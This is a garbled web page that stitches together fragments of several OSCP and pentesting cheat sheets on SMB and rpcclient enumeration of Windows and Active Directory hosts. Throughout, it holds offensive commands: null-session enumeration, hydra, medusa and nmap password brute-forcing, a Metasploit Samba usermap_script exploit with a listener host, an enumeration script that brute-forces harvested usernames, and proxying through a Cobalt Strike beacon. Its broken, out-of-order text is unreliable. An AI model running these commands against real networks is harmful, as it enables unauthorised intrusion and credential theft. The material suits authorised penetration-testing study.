rpcclient enumeration oscp

Published

Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: Moving on, same way, they can query info about specific AD users: Enumerate current user's privileges and many more (consult rpcclient for all available commands): Finally, of course they can run nmap if needed: Impacket provides even more tools to enumerate remote systems through compromised boxes. lsalookupprivvalue Get a privilege value given its name As from the previous commands, we saw that it is possible to create a user through rpcclient. A Mind Map about OSCP Guide submitted by Rikunj Sindhwad on Jun 12, 2021. During that time, the designers of the rpcclient might be clueless about the importance of this tool as a penetration testing tool. May need to run a second time for success. If the permissions allow, an attacker can delete a group as well. May need to run a second time for success. -i, --scope=SCOPE Use this Netbios scope, Authentication options: Active Directory & Kerberos Abuse. Are there any resources out there that go in-depth about SMB enumeration? help Get help on commands maybe brute-force ; 22/SSH. These privileges can help the attacker plan for elevating privileges on the domain. | Current user access: READ/WRITE SMB allows you to share your resources to other computers over the network, version susceptible to known attacks (Eternal blue , wanna cry), Disabled by default in newer Windows version, reduced "chattiness" of SMB1. | RRAS Memory Corruption vulnerability (MS06-025) On most Linuxes, we have tab auto-complete of commands, which extends into rpcclient commands. 548 - Pentesting Apple Filing Protocol (AFP) 554,8554 - Pentesting RTSP. samdeltas Query Sam Deltas | Type: STYPE_IPC_HIDDEN Obviously the SIDS are different but you can still pull down the usernames and start bruteforcing those other open services . result was NT_STATUS_NONE_MAPPED. 
As with the lsaenumsid, it was possible to extract the SID but it was not possible to tell which user has that SID. But sometimes these don't yield any interesting results. This tool is part of the samba(7) suite. PORT STATE SERVICE | \\[ip]\IPC$: | Type: STYPE_DISKTREE This means that SMB is running with NetBIOS over TCP/IP**. With --pw-nt-hash, the pwd provided is the NT hash, #Use --no-pass -c 'recurse;ls' to list recursively with smbclient, #List with smbmap, without folder it list everything. *' # download everything recursively in the wwwroot share to /usr/share/smbmap. -S, --signing=on|off|required Set the client signing state | grep -oP 'UnixSamba. can be cracked with, For passwordless login, add id_rsa.pub to target's authorized_keys, Add the extracted domain to /etc/hosts and dig again, rpcclient --user="" --command=enumprivs -N 10.10.10.10, rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np // get pipe names, smbclient -L //10.10.10.10 -N // No password (SMB Null session), crackmapexec smb 10.10.10.10 -u '' -p '' --shares, crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares, crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares, crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name, crackmapexec smb 192.168.0.115 -u '' -p '' --shares --pass-pol, ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v, mount -t cifs "//10.1.1.1/share/" /mnt/wins, mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0. Nmap scan report for [ip] We will shine the light on the process or methodology for enumerating SMB services on the Target System/Server in this article. This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). 
NETLOGON | State: VULNERABLE The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon, # You can also use samrdump.py for this purpose, Enumerate trusted domains within an AD forest. | Risk factor: HIGH . result was NT_STATUS_NONE_MAPPED SPOOLSS lsaaddacctrights Add rights to an account Works well for listing and downloading files, and listing shares and permissions. Enumerate Domain Users. path: C:\tmp rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1014 When dealing with SMB an attacker is bound to be dealt with the Network Shares on the Domain. | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 #These are the commands I run in order every time I see an open SMB port, smbclient -N //{IP}/ --option="client min protocol"=LANMAN1, crackmapexec smb {IP} --pass-pol -u "" -p "", crackmapexec smb {IP} --pass-pol -u "guest" -p "", GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all, GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat, GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/", smbmap -H {IP} -u {Username} -p {Password}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`, crackmapexec smb {IP} -u {Username} -p {Password} --shares, GetADUsers.py {Domain_Name}/{Username}:{Password} -all, GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat, GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request, https://book.hacktricks.xyz/pentesting/pentesting-smb, Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}, Description: SMB Vuln Scan With Nmap (Less Specific), Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}, Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb, Name: SMB/SMB2 139/445 consolesless 
mfs enumeration, Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole, Note: sourced from https://github.com/carlospolop/legion, Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'. The SID was retrieved using the lookupnames command. In there you may, many different batch, VBScript, and PowerShell, using some discovered credentials. . lsaenumsid Enumerate the LSA SIDS -z $2 ]; then rport=$2; else rport=139; fi, tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' It contains contents from other blogs for my quick reference, * nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan), masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports, ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//'), nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A, (performs full scan instead of syn-scan to prevent getting flagged by firewalls), From Apache Version to finding Ubuntu version -> ubuntu httpd versions, : Private key that is used for login. In the demonstration, it can be observed that the SID that was enumerated belonged to the Administrator of the Builtin users. [hostname] <00> - M LSARPC path: C:\tmp It also includes the commands that I used on platforms such as Vulnhub and Hack the Box. remark: IPC Service (Mac OS X) This is an approach I came up with while researching on offensive security. 
Let's see how this works by firstly updating the proxychains config file: Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: proxychains rpcclient 10.0.0.6 -U spotless, Victim (10.0.0.2) is enumerating DC (10.0.0.6) on behalf of attacker (10.0.0.5). logonctrl2 Logon Control 2 echoaddone Add one to a number deleteform Delete form It accepts the group name as a parameter. The article is focused on Red Teamers but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed. ECHO The next command to demonstrate is lookupsids. <03> - M *[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &, echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null, # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal, echo -e "\n########## Getting Netbios name ##########", echo -e "\n########## Checking for NULL sessions ##########", output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`, echo -e "\n########## Enumerating domains ##########", bash -c "echo 'enumdomains' | rpcclient $IP -U%", echo -e "\n########## Enumerating password and lockout policies ##########", echo -e "\n########## Enumerating users ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP, bash -c "echo 'enumdomusers' | rpcclient $IP -U%", bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt, echo -e "\n########## Enumerating Administrators ##########", net rpc group members "Administrators" -I $IP -U%, echo -e "\n########## Enumerating Domain Admins ##########", net rpc group members "Domain Admins" -I $IP -U%, echo -e "\n########## Enumerating groups ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP, echo -e "\n########## Enumerating shares ##########", nmap -Pn -T4 -sS -p139,445 
--script=smb-enum-shares $IP, echo -e "\n########## Bruteforcing all users with 'password', blank and username as password", hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1, medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt, nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv, msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run, msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run, Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016, nmap -p 445 $ip --script=smb-vuln-ms17-010, hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb, smbclient \\\\192.168.1.105\\ipc$ -U john. Once we have a SID we can enumerate the rest. Double pivot works the same, but you create the 2nd ssh tunnel via proxychains and a different dynamic port. Most secure. queryuser Query user info exit Exit program lsaenumprivsaccount Enumerate the privileges of an SID A NetBIOS name is up to 16 characters long and usually, separate from the computer name. To demonstrate this, the attacker first used the lsaaddpriv command to add the SeCreateTokenPrivielge to the SID and then used the lsadelpriv command to remove that privilege from that group as well. deldriverex Delete a printer driver with files This problem is solved using lookupnames whereupon providing username the SID of that particular user can be extracted with ease. With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. querygroupmem Query group membership It is also possible to manipulate the privileges of that SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether. SYSVOL NO ACCESS, [+] Finding open SMB ports. 
If you get credentials, you can re-run to show new access: nmap --script smb-enum-shares -p 139,445 [ip]. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1000 rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002 NETLOGON READ ONLY 445/tcp open microsoft-ds After creating the group, it is possible to see the newly created group using the enumdomgroup command. samquerysecobj Query SAMR security object rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2001 setform Set form --------------- ---------------------- change_trust_pw Change Trust Account Password At last, it can be verified using the enumdomusers command. Some of these commands are based on those executed by the Autorecon tool. --------------- ---------------------- dfsgetinfo Query DFS share info to access through Web; FTP to file upload ==> Execute from web == webshell ; Password Checking if you found with other enum. Shortcut to New Folder (2).lnk A 420 Sun Dec 13 05:24:51 2015 Reverse Shell. Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can ever execute commands on writable shares. srvinfo Server query info |_ https://technet.microsoft.com/en-us/library/security/ms06-025.aspx logonctrl Logon Control What script needs to be executed on the user's login? An attacker can create an account object based on the SID of that user. A Little Guide to SMB Enumeration. To do this first, the attacker needs a SID. It can be used on the rpcclient shell that was generated to enumerate information about the server. In the demonstration, it can be observed that the user has stored their credentials in the Description. 
You can also fire up wireshark and list target shares with smbclient , you can use anonymous listing to explained above and after that find , hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb. shutdownabort Abort Shutdown (over shutdown pipe) Host script results: rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-500 Learn more about the OS Versions. 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP. 
lsaquerysecobj Query LSA security object # download everything recursively in the wwwroot share to /usr/share/smbmap. rpcclient $> lookupnames lewis Nice! Enter WORKGROUP\root's password: setprinterdata Set REG_SZ printer data Hence, they usually set up a Network Share. After the user details and the group details, another information that can help an attacker that has retained the initial foothold on the domain is the Privileges.
